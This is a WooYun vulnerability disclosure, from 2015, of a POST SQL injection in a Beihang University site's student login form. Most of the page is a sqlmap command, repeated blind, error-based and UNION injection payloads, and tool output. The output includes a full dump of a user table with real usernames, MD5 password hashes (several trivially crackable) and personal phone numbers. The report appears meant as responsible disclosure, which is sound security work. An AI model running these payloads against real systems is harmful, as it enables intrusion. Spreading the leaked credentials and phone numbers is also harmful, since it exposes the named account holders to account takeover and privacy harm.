当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151770

漏洞标题:北京航空航天大学某站存在POST型SQL注射漏洞(admin等用户密码及电话号码泄露)

相关厂商:北京航空航天大学

漏洞作者: 路人甲

提交时间:2015-11-04 15:46

修复时间:2015-12-21 15:18

公开时间:2015-12-21 15:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-04: 细节已通知厂商并且等待厂商处理中
2015-11-06: 厂商已经确认,细节仅向厂商公开
2015-11-16: 细节向核心白帽子及相关领域专家公开
2015-11-26: 细节向普通白帽子公开
2015-12-06: 细节向实习白帽子公开
2015-12-21: 细节向公众公开

简要描述:

北京航空航天大学(简称北航)成立于1952年,由当时的清华大学、北洋大学、厦门大学、四川大学等八所院校的航空系合并组建,是新中国第一所航空航天高等学府,现隶属于工业和信息化部。学校分为学院路校区和沙河校区,占地3000亩,总建筑面积150余万平方米。自建校以来,北航一直是国家重点建设的高校,是全国第一批16所重点高校之一,也是80年代恢复学位制度后全国第一批设立研究生院的22所高校之一,首批进入“211工程”,2001年进入“985工程”。经过六十年的建设与发展,学校基本形成了研究型大学的核心竞争力,内在凝聚力和国内外影响力得到显著提升,跻身国内高水平大学的第一方阵。

详细说明:

地址:http://**.**.**.**/student/my/login

python sqlmap.py -u "http://**.**.**.**/student/my/login" --form -p LoginForm[username] --technique=BEU --random-agent --batch -D inspection -T in_user -C user_name,user_id,user_pwd,user_phone,user_qq,user_email,user_nkname --dump

漏洞证明:

---
Parameter: LoginForm[username] (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: LoginForm[username]=bldj') RLIKE (SELECT (CASE WHEN (5130=5130) THEN 0x626c646a ELSE 0x28 END)) AND ('SBlj'='SBlj&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: LoginForm[username]=bldj') AND (SELECT 4840 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71,(SELECT (ELT(4840=4840,1))),0x7171786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('QyKa'='QyKa&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
    Type: UNION query
    Title: MySQL UNION query (NULL) - 63 columns
    Payload: LoginForm[username]=bldj') UNION ALL SELECT CONCAT(0x716a6a6a71,0x534a655a6a45527170425162785371454362464d6c4c7449696f51616d5371786e6559764867496f,0x7171786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
---
web application technology: PHP 5.3.13, Apache
back-end DBMS: MySQL 5.0
current user:    'inspection@localhost'
current user is DBA:    False
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: LoginForm[username] (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: LoginForm[username]=bldj') RLIKE (SELECT (CASE WHEN (5130=5130) THEN 0x626c646a ELSE 0x28 END)) AND ('SBlj'='SBlj&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: LoginForm[username]=bldj') AND (SELECT 4840 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71,(SELECT (ELT(4840=4840,1))),0x7171786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('QyKa'='QyKa&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
    Type: UNION query
    Title: MySQL UNION query (NULL) - 63 columns
    Payload: LoginForm[username]=bldj') UNION ALL SELECT CONCAT(0x716a6a6a71,0x534a655a6a45527170425162785371454362464d6c4c7449696f51616d5371786e6559764867496f,0x7171786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
---
web application technology: PHP 5.3.13, Apache
back-end DBMS: MySQL 5.0
database management system users [1]:
[*] 'inspection'@'localhost'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: LoginForm[username] (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: LoginForm[username]=bldj') RLIKE (SELECT (CASE WHEN (5130=5130) THEN 0x626c646a ELSE 0x28 END)) AND ('SBlj'='SBlj&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: LoginForm[username]=bldj') AND (SELECT 4840 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71,(SELECT (ELT(4840=4840,1))),0x7171786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('QyKa'='QyKa&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
    Type: UNION query
    Title: MySQL UNION query (NULL) - 63 columns
    Payload: LoginForm[username]=bldj') UNION ALL SELECT CONCAT(0x716a6a6a71,0x534a655a6a45527170425162785371454362464d6c4c7449696f51616d5371786e6559764867496f,0x7171786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
---
web application technology: PHP 5.3.13, Apache
back-end DBMS: MySQL 5.0
available databases [2]:
[*] information_schema
[*] inspection
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: LoginForm[username] (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: LoginForm[username]=bldj') RLIKE (SELECT (CASE WHEN (5130=5130) THEN 0x626c646a ELSE 0x28 END)) AND ('SBlj'='SBlj&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: LoginForm[username]=bldj') AND (SELECT 4840 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71,(SELECT (ELT(4840=4840,1))),0x7171786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('QyKa'='QyKa&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
    Type: UNION query
    Title: MySQL UNION query (NULL) - 63 columns
    Payload: LoginForm[username]=bldj') UNION ALL SELECT CONCAT(0x716a6a6a71,0x534a655a6a45527170425162785371454362464d6c4c7449696f51616d5371786e6559764867496f,0x7171786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
---
web application technology: PHP 5.3.13, Apache
back-end DBMS: MySQL 5.0
Database: inspection
[37 tables]
+---------------------------+
| YiiSession                |
| in_application            |
| in_arrange                |
| in_arrangebak             |
| in_assignxy               |
| in_attendance             |
| in_authassignment         |
| in_authitem               |
| in_authitemchild          |
| in_config                 |
| in_course                 |
| in_courseallocation       |
| in_courseallocationbak    |
| in_coursebak              |
| in_delayed                |
| in_emapp                  |
| in_examinationarrangement |
| in_exemption              |
| in_files                  |
| in_information            |
| in_lookup                 |
| in_organization           |
| in_otinfo                 |
| in_pici                   |
| in_precord                |
| in_professional           |
| in_professionalbak        |
| in_province               |
| in_review                 |
| in_scrollpicture          |
| in_setconfig              |
| in_sjpici                 |
| in_students               |
| in_students_manage        |
| in_teacher                |
| in_user                   |
| in_vestigate              |
+---------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: LoginForm[username] (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: LoginForm[username]=bldj') RLIKE (SELECT (CASE WHEN (5130=5130) THEN 0x626c646a ELSE 0x28 END)) AND ('SBlj'='SBlj&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: LoginForm[username]=bldj') AND (SELECT 4840 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71,(SELECT (ELT(4840=4840,1))),0x7171786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('QyKa'='QyKa&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
    Type: UNION query
    Title: MySQL UNION query (NULL) - 63 columns
    Payload: LoginForm[username]=bldj') UNION ALL SELECT CONCAT(0x716a6a6a71,0x534a655a6a45527170425162785371454362464d6c4c7449696f51616d5371786e6559764867496f,0x7171786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
---
web application technology: PHP 5.3.13, Apache
back-end DBMS: MySQL 5.0
Database: inspection
Table: in_user
[27 columns]
+-------------------+------------------+
| Column            | Type             |
+-------------------+------------------+
| user_adderss      | varchar(100)     |
| user_authorize    | varchar(500)     |
| user_bddm         | varchar(100)     |
| user_email        | varchar(30)      |
| user_headimg      | varchar(100)     |
| user_id           | int(11) unsigned |
| user_iparr        | varchar(3000)    |
| user_isdel        | int(11)          |
| user_lastip       | varchar(50)      |
| user_lasttime     | int(11)          |
| user_loginnum     | int(11)          |
| user_msn          | varchar(100)     |
| user_name         | varchar(30)      |
| user_nkname       | varchar(100)     |
| user_online       | int(11)          |
| user_organization | int(11)          |
| user_phone        | varchar(50)      |
| user_pwd          | varchar(50)      |
| user_qq           | varchar(50)      |
| user_regtime      | int(11)          |
| user_role         | int(11)          |
| user_rolebz       | varchar(100)     |
| user_sfqz         | varchar(100)     |
| user_status       | int(11)          |
| user_tel          | varchar(50)      |
| user_tel2         | varchar(50)      |
| user_webset       | varchar(100)     |
+-------------------+------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: LoginForm[username] (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: LoginForm[username]=bldj') RLIKE (SELECT (CASE WHEN (5130=5130) THEN 0x626c646a ELSE 0x28 END)) AND ('SBlj'='SBlj&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: LoginForm[username]=bldj') AND (SELECT 4840 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71,(SELECT (ELT(4840=4840,1))),0x7171786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('QyKa'='QyKa&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
    Type: UNION query
    Title: MySQL UNION query (NULL) - 63 columns
    Payload: LoginForm[username]=bldj') UNION ALL SELECT CONCAT(0x716a6a6a71,0x534a655a6a45527170425162785371454362464d6c4c7449696f51616d5371786e6559764867496f,0x7171786a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&LoginForm[password]=&LoginForm[verifyCode]=asGb&B1=%E7%99%BB %E5%BD%95
---
web application technology: PHP 5.3.13, Apache
back-end DBMS: MySQL 5.0
Database: inspection
Table: in_user
[37 entries]
+--------------+---------+----------------------------------+-------------+---------+------------------+-----------------------------------------------------------+
| user_name    | user_id | user_pwd                         | user_phone  | user_qq | user_email       | user_nkname                                               |
+--------------+---------+----------------------------------+-------------+---------+------------------+-----------------------------------------------------------+
| admin        | 1       | 82a4e6229c04c7eea5270cee9219cec8 | NULL        | NULL    | <blank>          | čś\x85级玥ç\x90\x86ĺ\x91\x98                            |
| sysadmin     | 2       | 8b803df8479a34c942a39ec906ca6e81 | NULL        | NULL    | <blank>          | çłťçť\x9f玥ç\x90\x86ĺ\x91\x98                            |
| hdjgzx       | 3       | 5ee4dad4aaa2154c58c325f257d21bfc | <blank>     | NULL    | <blank>          | ĺ\x8d\x8eä¸\x9c玥ç\x90\x86ä¸\x8eć\x9c\x8dĺ\x8aĄä¸­ĺż\x83 |
| hdjgzx1      | 4       | 5ee4dad4aaa2154c58c325f257d21bfc | NULL        | NULL    | NULL             | ĺ\x8d\x8eä¸\x9cç\x9b\x91玥中ĺż\x83                      |
| bjshenhe     | 5       | 14a2ee741534eef7c80edbe89de55924 | <blank>     | NULL    | <blank>          | ĺ\x8c\x97亏厥核玥ç\x90\x86                            |
| 1000642001   | 10      | 4cd034305b3027762ee2ebfa15edbcb2 | <blank>     | NULL    | <blank>          | ĺ¤\x8fć\x98Ľçş˘                                           |
| shuangxin    | 11      | e10adc3949ba59abbe56e057f20f883e | <blank>     | NULL    | <blank>          | é\x83­ä¸šç\x90´                                           |
| 1000642003   | 12      | 00044b51262110c94868789ebfb089e8 | <blank>     | NULL    | <blank>          | ć\x88´é\x94\x90                                           |
| quanhao      | 13      | e10adc3949ba59abbe56e057f20f883e | <blank>     | NULL    | <blank>          | topwater                                                  |
| xuhuizx      | 14      | e10adc3949ba59abbe56e057f20f883e | <blank>     | NULL    | <blank>          | allround                                                  |
| 10006888     | 15      | e10adc3949ba59abbe56e057f20f883e | <blank>     | NULL    | <blank>          | gxl                                                       |
| acking       | 17      | fcea920f7412b5da7be0cf42b8c93759 | <blank>     | NULL    | <blank>          | acking                                                    |
| 1000652101   | 18      | e10adc3949ba59abbe56e057f20f883e | <blank>     | NULL    | <blank>          | ć˝\x98ç­ąäş\x91                                           |
| 1000642004   | 19      | a5407e92b245b0c06017c9e6d381e6b5 | <blank>     | NULL    | <blank>          | é\x99\x88č\x8f\x8a                                        |
| chenju01     | 20      | eeef89774499b8aab48a9e477c0a0794 | <blank>     | NULL    | <blank>          | é\x99\x88č\x8f\x8a                                        |
| 1000641801   | 21      | 80c4b59647a5057d6f463ba95bf0063b | <blank>     | NULL    | <blank>          | ç\x8e\x8bç\x8fŽč\x93\x93                                  |
| 1000652201   | 22      | 6d8a4276ee71937f560b4ff50651cfe8 | <blank>     | NULL    | <blank>          | 莸波ĺ\x8b\x87                                           |
| 1000652101   | 24      | c16cdbf424606c50ccd1184361d20ac5 | <blank>     | NULL    | <blank>          | ä˝\x95é\x92°                                              |
| 1000640401   | 25      | ac1c2e86c2a8fb808325d8200d82b0c8 | <blank>     | NULL    | <blank>          | çĽ\x81ĺž\x97ć\x98\x8e                                     |
| 1000640301   | 26      | 20f58afd3043cdaf169ca9f2d3412bd2 | <blank>     | NULL    | <blank>          | ç\x8e\x8bć\x96\x87äź\x9f                                  |
| 1000640501   | 27      | 90aedecc1034df83a9159f85cee09a80 | 1897999500  | NULL    | <blank>          | ĺ\x88\x98çŁ\x8a                                           |
| 1000645101   | 28      | a6a9b25e58a394ad7d7aae309226c8a5 | <blank>     | NULL    | <blank>          | é\x82ąĺ°\x8fĺšł                                           |
| 1000645001   | 29      | 9c1a8a30ac217bb9153e77b991aa6cf1 | <blank>     | NULL    | <blank>          | čľľĺŠ\x95                                                 |
| 1000642101   | 30      | fe1ee07a4acf16deb81efbef42c7b119 | <blank>     | NULL    | <blank>          | ĺ§\x9a鲲                                                 |
| qianlaoshi01 | 31      | cf5d7313034fdff73bdf5cd044916141 | <blank>     | NULL    | <blank>          | ć˝\x9cçť´ĺ\x85´                                           |
| 1000642002   | 32      | 04ad64c1bfa92ff9061ddf91b797ff9b | <blank>     | NULL    | <blank>          | ĺ­\x99č\x8eš                                              |
| 1000646401   | 33      | c80f865e9abc8b415cbc9701214cb3a1 | <blank>     | NULL    | <blank>          | ć\x9bšĺ\x85śçŤŻ                                           |
| beijing      | 34      | e10adc3949ba59abbe56e057f20f883e | <blank>     | NULL    | <blank>          | ĺ\x8c\x97亏                                              |
| bhceshi      | 35      | d6a21b3940d10ce5753052d5f48c5ee8 | 123456      | NULL    | 11111            | cj                                                        |
| wuzhenyou    | 37      | ae45fcd57b567b6e2ec8f3d5ee73b458 | 13918160512 | NULL    | <blank>          | é\x99\x88ĺ\x8fś                                           |
| sitadi       | 38      | 96e79218965eb72c92a549dd5a330112 | 18918597013 | NULL    | <blank>          | ç\x8e\x8bć\x85§čś\x85                                     |
| sitadi       | 39      | d04bcd6748b9ceee3063386209fae5e7 | 18918597013 | NULL    | 421032151@**.**.**.** | ç\x8e\x8bć\x85§čś\x85                                     |
| xinshijie    | 40      | 96e79218965eb72c92a549dd5a330112 | 13916760738 | NULL    | <blank>          | ć˘\x81澡ćŚ\x95                                           |
| xuesen       | 41      | 21218cca77804d2ba1922c33e0151105 | 15216604364 | NULL    | <blank>          | ć\x9d\x9c棎                                              |
| haowei       | 42      | 96e79218965eb72c92a549dd5a330112 | <blank>     | NULL    | <blank>          | é˝\x90丽č\x90\x8d                                        |
| nanhui       | 43      | 96e79218965eb72c92a549dd5a330112 | <blank>     | NULL    | <blank>          | é\x83­ä¸šç\x90´                                           |
| bjceshi      | 44      | e10adc3949ba59abbe56e057f20f883e | <blank>     | NULL    | <blank>          | éŤ\x98ĺąą                                                 |
+--------------+---------+----------------------------------+-------------+---------+------------------+-----------------------------------------------------------+

修复方案:

增加过滤。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-06 15:17

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给赛尔教育,由其后续协调网站管理单位处置。

最新状态:

暂无

漏洞评价:

评价